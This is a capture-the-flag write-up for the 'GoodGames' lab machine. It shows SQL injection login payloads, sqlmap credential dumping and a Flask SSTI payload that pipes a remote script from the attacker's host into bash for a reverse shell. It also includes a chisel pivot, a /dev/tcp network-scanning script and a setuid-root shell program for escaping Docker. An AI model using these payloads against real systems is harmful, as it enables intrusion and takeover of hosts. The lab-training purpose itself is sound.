Information Gathering
IP Address: 10.10.11.130 — Open Ports: TCP:80
$ sudo masscan -p1-65535,U:1-65535 10.10.11.130 --rate=1000 -p1-65535,U:1-65535 -e tun0 > /tmp/ports
$ ports=$(cat /tmp/ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//')
$ nmap -Pn -sV -sC -p$ports 10.10.11.130
- PORT STATE SERVICE VERSION
- 80/tcp open http Apache httpd 2.4.51
- |_http-server-header: Werkzeug/2.0.2 Python/3.9.2
- |_http-title: GoodGames | Community and Store
- Service Info: Host: goodgames.htb
SQLI
# echo '10.10.11.130 goodgames.htb' >> /etc/hosts
$ dirsearch -u 'http://goodgames.htb'
$ ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://FUZZ.goodgames.htb -H "Host: FUZZ.goodgames.htb" -ac
email=1%40gmail.com'--+&password=123
email=1%40gmail.com'%20OR%20'1'='1'--+&password=123
$ sqlmap -r sqli -p email --batch
$ sqlmap -r sqli -p email --batch -D main -T user --dump
email:admin@goodgames.htb
username:admin
password:superadministrator
# echo '10.10.11.130 internal-administration.goodgames.htb' >> /etc/hosts
Flask SSTI (Server-Side Template Injection)
http://internal-administration.goodgames.htb/login
- POST /settings HTTP/1.1
- Host: internal-administration.goodgames.htb
- User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
- Accept-Language: en-US,en;q=0.5
- Accept-Encoding: gzip, deflate, br
- Content-Type: application/x-www-form-urlencoded
- Content-Length: 12
- Origin: http://internal-administration.goodgames.htb
- Connection: close
- Referer: http://internal-administration.goodgames.htb/settings
- Cookie: session=.eJwlzjmOAjEQQNG7OJ6gNttlLtOyaxFopBmpGyLE3WlE-F_0n2XLPY5rudz3R_yU7eblUmbNTKJOMTv2xlEnLvZRZa6cyFlXApt0B8yTWRbWcKjWxBynA7euMwcNqoxhGCBJQ62zDFouHEMJZWlVc9eVlg20Z-uGiOUceRyxf28-acee2_3_N_5OSIfAIS1aR1OxaO5jgShFCrBKJVTXVl5vIF4_KQ.Z5IPJg.xnuJSS0C6PcZvOJeMd6iV8AclZE
- Upgrade-Insecure-Requests: 1
- name={{9*9}}
name={{config.__class__.__init__.__globals__['os'].popen('curl%20http://10.10.16.16/rev|bash').read()}}
User.txt
388118f20c90df4d38744d9ac624dd43
Privilege Escalation: Docker Escape
Server:
$ chisel server -p 8000 --reverse
Client:
# ./chisel_1.10.1_linux_amd64 client 10.10.16.16:8000 R:localhost:1080:socks
Server:
$ vim 10.10.11.130.conf

Client:
# arp -a

https://raw.githubusercontent.com/S12cybersecurity/Pivoting_Enum/refs/heads/main/pivoting.sh
- #!/bin/bash
- # pivoting.sh — host/port discovery run from a foothold (here: inside the
- # Docker container) against the networks given on the command line.
- # Usage: ./pivoting.sh NET [NET ...]   where NET is the first three octets
- #        of a /24 (e.g. 192.168.0); only the first four NETs are honoured.
- # Outputs: progress on stdout; every responding address is also appended to
- #          ./hosts.txt (an on-disk artifact the script leaves behind).
- # Requires: bash (for [[ ]], arrays and /dev/tcp), ifconfig, ping, timeout, seq.
- # Detection note: per /24 this sends one ICMP echo to each of 254 addresses,
- # then ~10k TCP connection attempts to every host that answered — a loud,
- # easily alertable pattern.
- #
- # ANSI SGR colour escapes; expanded by the `echo -e` calls below.
- RED="\e[31m"
- GREEN="\e[32m"
- YELLOW="\e[33m"
- ENDCOLOR="\e[0m"
- hostname=$(hostname)
- echo -e "${GREEN}[+] Basic Information on $hostname machine${ENDCOLOR}"
- echo -e "\n${YELLOW}List of Machine Local IP's:${ENDCOLOR}"
- # `$(NF - -4)` is `$(NF+4)`, a field past the end of the line, so awk prints an
- # empty string: the effective output is " <last field>", and `cut -c 2-` strips
- # that leading space. The grep patterns are regexes, so the unescaped `.`
- # matches any character (e.g. "172." also matches "1720").
- ifconfig | awk '{print $(NF - -4), $NF}' | grep "172." | cut -c 2-
- ifconfig | awk '{print $(NF - -4), $NF}' | grep "192." | cut -c 2-
- # The trailing grep -v drops lines ending in "0x10<host>" (presumably the IPv6
- # loopback scope id ifconfig prints, which also contains "10.").
- ifconfig | awk '{print $(NF - -4), $NF}' | grep "10." | cut -c 2- | grep -v "0x10<host>"
- echo -e "\n${YELLOW}Utilities:${ENDCOLOR}"
- # Inventory of tooling present on the host. `which` is non-POSIX; `command -v`
- # is the portable equivalent. Hardening note: a minimal image without
- # compilers/interpreters/network clients gives this section nothing to report.
- which aws
- which netcat
- which nc.traditional
- which curl
- which ping
- which gcc
- which g++
- which make
- which gdb
- which base64
- which socat
- which python
- which python2
- which python3
- which perl
- which php
- which ruby
- which xterm
- which sudo
- which wget
- which nc
- which nmap
- which fping
- echo -e "\n"
- echo -e "${GREEN}[+] Network Recon\n${ENDCOLOR}"
- # Unquoted $1: with no argument this becomes `[ -z ]`, which is still true, so
- # the usage check works; an argument containing whitespace would break it.
- if [ -z $1 ]
- then
- echo -e "${RED}[*] Syntax: <NETWORK/S TO SCAN> Format: 192.168.0 ${ENDCOLOR}"
- exit 1
- fi
- # Each branch below is a regex *substring* match on the argument count, not an
- # equality test: `$# =~ 1` is also true for 10–19 arguments. Only 1–4 networks
- # are supported; with e.g. 5–9 arguments no branch fires, `hosts` stays unset
- # and the loops below do nothing. `hosts=($1)` is unquoted, so each argument is
- # word-split again.
- if [[ $# =~ 1 ]]
- then
- hosts=($1)
- echo -e "${GREEN}List of Networks: ${ENDCOLOR}"$hosts
- fi
- if [[ $# =~ 2 ]]
- then
- hosts=($1 $2)
- echo -e "${GREEN}List of Networks: ${ENDCOLOR}"${hosts[0]}", "${hosts[1]}
- fi
- if [[ $# =~ 3 ]]
- then
- hosts=($1 $2 $3)
- echo -e "${GREEN}List of Networks: ${ENDCOLOR}"${hosts[0]}", "${hosts[1]}", "${hosts[2]}
- fi
- if [[ $# =~ 4 ]]
- then
- hosts=($1 $2 $3 $4)
- echo -e "${GREEN}List of Networks: ${ENDCOLOR}"${hosts[0]}", "${hosts[1]}", "${hosts[2]}", "${hosts[3]}
- fi
- # Host discovery: one ICMP echo per address .1–.254, run sequentially.
- for host in ${hosts[@]}; do
- echo -e "\n${YELLOW}[*] Enumerating Network: $host${ENDCOLOR}\n"
- for i in $(seq 1 254); do
- # Foreground probe (no `&`), capped at 0.5 s by timeout.
- timeout 0.5 bash -c "ping -c 1 $host.$i" &> /dev/null
- # $a is timeout's exit status: ping's own status on completion, 124 on timeout.
- a=$(echo $?)
- # Substring match for "0": status 0 matches; 1, 2 and 124 do not.
- if [[ $a =~ 0 ]]
- then
- # Append to the global `array` consumed by the port-scan loop below,
- # and persist the address to ./hosts.txt in the current directory.
- array[${#array[@]}]=$host.$i
- echo $host.$i >> hosts.txt
- # Second ping to read the reply TTL. On iputils output
- # ("... ttl=64 time=0.05 ms") the awk prints "ttl=64 ms" and
- # `cut -c 5-7` keeps the digits after "ttl=".
- b=$(ping -c 1 $host.$i | grep 'ttl' | awk '{print $(NF - 2), $NF}' | cut -c 5-7)
- # OS guess from the TTL: 64 (Linux default) or 128 (Windows default),
- # minus up to two hops. Still substring matches, not numeric compares.
- if [[ $b =~ 64 ]] || [[ $b =~ 63 ]] || [[ $b =~ 62 ]]
- then
- echo "[+] HOST $host.$i ACTIVE [OS=Linux]"
-
- elif [[ $b =~ 128 ]] || [[ $b =~ 127 ]] || [[ $b =~ 126 ]]
- then
- echo "[+] HOST $host.$i ACTIVE [OS=Windows]"
- else
- echo "[+] HOST $host.$i ACTIVE [OS=UNDETECTED]"
- fi
- fi
- # Nothing in this loop was backgrounded, so `wait` returns immediately.
- done; wait
- done
- # Port scan of every discovered host: a bash /dev/tcp connect per port,
- # capped at 1 s. The whole `timeout ... && echo ...` list is backgrounded, so
- # up to 10001 jobs run concurrently per host; `wait` collects them.
- for host in ${array[@]}; do
- echo -e "\n${YELLOW}[*] Scanning Ports on: $host${ENDCOLOR}\n"
- for port in $(seq 1 10001); do
- timeout 1 bash -c "echo '' > /dev/tcp/$host/$port" 2> /dev/null && echo -e "\t[+] PORT $host:$port OPEN" &
- done; wait
- done
# ./host_discovery.sh 172.19.0

Server:
$ sudo proxychains -f 10.10.11.130.conf ssh augustus@172.19.0.1

Docker 用户在 augustus 目录中创建 test 文件，test 的所有者是 root。

- /* suid.c: minimal setuid-root shell wrapper used for the escalation step.
-  * It is built and chmod u+s'd as root inside the container on a directory
-  * the host also sees, so the host user ends up with a root-owned setuid
-  * binary. Mitigation: do not share root-writable bind mounts with a
-  * container, and mount shared volumes with `nosuid`. */
- #include <stdio.h>   /* unused by this program */
- #include <stdlib.h>  /* system() */
- /* NOTE(review): setuid() is declared in <unistd.h>, which is not included;
-  * this relies on an implicit declaration that newer compilers reject. */
- int main() {
- /* Return value unchecked: if the file is not actually setuid-root this fails
-  * with EPERM and the shell below simply runs as the caller. */
- setuid(0);
- system("/bin/bash");
- /* No explicit return: main() yields 0 implicitly under C99 and later. */
- }
# wget http://10.10.16.16/suid.c
# gcc suid.c -o suid
# chmod u+s suid
augustus@GoodGames:~$ ./suid
Root.txt
a42c76fe28f8a2556fa7e8794f133c15